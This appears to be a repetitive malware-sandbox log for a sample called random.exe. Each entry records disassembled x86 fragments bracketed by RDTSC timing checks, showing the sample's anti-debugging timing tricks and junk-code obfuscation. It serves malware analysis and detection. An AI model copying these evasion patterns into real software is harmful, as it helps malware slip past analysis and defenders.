Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1086355 second address: 1086373 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1086373 second address: 1086377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108B9E3 second address: 108B9FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CD044E5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1086377 second address: 108638C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F980CCD2248h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108638C second address: 1086390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108B9FC second address: 108BA95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD2254h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c movsx edi, cx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F980CCD2248h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov ebx, 7C674772h 0x00000030 call 00007F980CCD2258h 0x00000035 movzx ebx, di 0x00000038 pop edi 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F980CCD2248h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 ja 00007F980CCD2250h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1086390 second address: 1086394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1085379 second address: 108537E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10882AA second address: 10882B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108BA95 second address: 108BAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F980CCD2246h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10882B0 second address: 1088352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 ja 00007F980CD044EFh 0x0000000c nop 0x0000000d mov ebx, dword ptr [ebp+122D3975h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F980CD044D8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b mov dword ptr [ebp+122D1D71h], esi 0x00000041 mov eax, dword ptr [ebp+122D12F1h] 0x00000047 push FFFFFFFFh 0x00000049 push 00000000h 0x0000004b push ebx 0x0000004c call 00007F980CD044D8h 0x00000051 pop ebx 0x00000052 mov dword ptr [esp+04h], ebx 0x00000056 add dword ptr [esp+04h], 00000014h 0x0000005e inc ebx 0x0000005f push ebx 0x00000060 ret 0x00000061 pop ebx 0x00000062 ret 0x00000063 jmp 00007F980CD044DEh 0x00000068 mov bx, 3AB4h 0x0000006c nop 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1088352 second address: 1088356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1088356 second address: 108835C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108835C second address: 1088385 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F980CCD2257h 0x00000008 jmp 00007F980CCD2251h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F980CCD224Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108933C second address: 10893FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F980CD044D8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jng 00007F980CD044EEh 0x0000002c call 00007F980CD044E1h 0x00000031 mov ebx, dword ptr [ebp+122D3B7Dh] 0x00000037 pop ebx 0x00000038 mov dword ptr [ebp+122D308Dh], esi 0x0000003e push dword ptr fs:[00000000h] 0x00000045 mov bh, 5Ah 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F980CD044D8h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 0000001Bh 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 mov eax, dword ptr [ebp+122D0A99h] 0x0000006e mov ebx, dword ptr [ebp+122D3B61h] 0x00000074 jmp 00007F980CD044E5h 0x00000079 push FFFFFFFFh 0x0000007b mov dword ptr [ebp+122D1E33h], edi 0x00000081 nop 0x00000082 pushad 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007F980CD044DBh 0x0000008a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1088385 second address: 108838B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108CAB0 second address: 108CAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108CAB5 second address: 108CAC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CCD2250h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108F0FA second address: 108F0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108CC2A second address: 108CC2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108F0FF second address: 108F146 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F980CD044DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sbb ebx, 64500AB1h 0x00000013 movsx ebx, si 0x00000016 push 00000000h 0x00000018 mov ebx, 59BF0591h 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F980CD044D8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 push eax 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10922B1 second address: 10922B6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1092BDF second address: 1092BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1097E67 second address: 1097E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109B111 second address: 109B11F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 jbe 00007F980CD044DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109B282 second address: 109B28C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F980CCD2246h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109B3DD second address: 109B3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109B3E1 second address: 109B405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD2256h 0x00000007 js 00007F980CCD2246h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109DDF3 second address: 109DE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 jne 00007F980CD044DCh 0x0000000d popad 0x0000000e jl 00007F980CD044E6h 0x00000014 push edi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 jp 00007F980CD044DCh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1025C71 second address: 1025C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A134C second address: 10A135A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CD044DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A1424 second address: 10A142A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A4682 second address: 10A468D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F980CD044D6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A468D second address: 10A4692 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A4692 second address: 10A469F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9777 second address: 10A977B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A977B second address: 10A97A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F980CD044D6h 0x00000010 jmp 00007F980CD044E5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A97A0 second address: 10A97CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD2256h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F980CCD2250h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1034FDD second address: 1034FE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A8D4D second address: 10A8D52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9476 second address: 10A9493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F980CD044E3h 0x0000000a popad 0x0000000b push esi 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9601 second address: 10A9615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CCD224Fh 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9615 second address: 10A9628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F980CD044D6h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9628 second address: 10A962E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10ADF42 second address: 10ADF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F980CD044D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AE1F7 second address: 10AE20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F980CCD2252h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AE20F second address: 10AE217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AE385 second address: 10AE39E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F980CCD2251h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AE96A second address: 10AE981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CD044DCh 0x00000009 jng 00007F980CD044D6h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10AE981 second address: 10AE986 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10B607D second address: 10B60B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F980CD044E2h 0x00000010 je 00007F980CD044D6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10B60B3 second address: 10B60C7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F980CCD2246h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BA5F9 second address: 10BA608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BADDC second address: 10BADE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BADE2 second address: 10BADEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BADEC second address: 10BADFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F980CCD2246h 0x0000000a pop edi 0x0000000b jnp 00007F980CCD224Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BB4BA second address: 10BB4BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1059E7C second address: 1059E82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1036A9E second address: 1036AA4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C03F3 second address: 10C03F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C03F7 second address: 10C0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107B149 second address: 1059308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007F980CCD224Ch 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2766h], esi 0x00000013 call dword ptr [ebp+12463072h] 0x00000019 pushad 0x0000001a pushad 0x0000001b jp 00007F980CCD2246h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107B2C8 second address: 107B2ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F980CD044E9h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107B717 second address: 107B71B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107B7F5 second address: 107B800 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F980CD044D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107B800 second address: 107B81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F980CCD2250h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107B848 second address: 107B869 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F980CD044E3h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BB67 second address: 107BB71 instructions: 0x00000000 rdtsc 0x00000002 js 00007F980CCD224Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BF1B second address: 107BF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BF21 second address: 107BF25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107BF25 second address: 107BF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F980CD044DCh 0x00000011 jnl 00007F980CD044D6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C0B2 second address: 107C0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C2B3 second address: 107C2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C430 second address: 107C436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C436 second address: 1059E7C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F980CD044DCh 0x00000008 jl 00007F980CD044D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F980CD044DBh 0x00000016 nop 0x00000017 xor dword ptr [ebp+122DB55Dh], edi 0x0000001d call dword ptr [ebp+122D332Bh] 0x00000023 push ecx 0x00000024 pushad 0x00000025 jnl 00007F980CD044D6h 0x0000002b jc 00007F980CD044D6h 0x00000031 push edx 0x00000032 pop edx 0x00000033 popad 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jne 00007F980CD044D6h 0x0000003f jne 00007F980CD044D6h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BF687 second address: 10BF68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BF68B second address: 10BF691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BFBA1 second address: 10BFBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BFCED second address: 10BFCF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BFCF1 second address: 10BFCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BFCFA second address: 10BFCFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C39F8 second address: 10C3A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CCD2255h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C3E14 second address: 10C3E34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F980CD044D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F980CD044E1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C3E34 second address: 10C3E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F980CCD2246h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C3E47 second address: 10C3E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C3E4B second address: 10C3E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C7D66 second address: 10C7D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F980CD044D6h 0x0000000a rdtsc
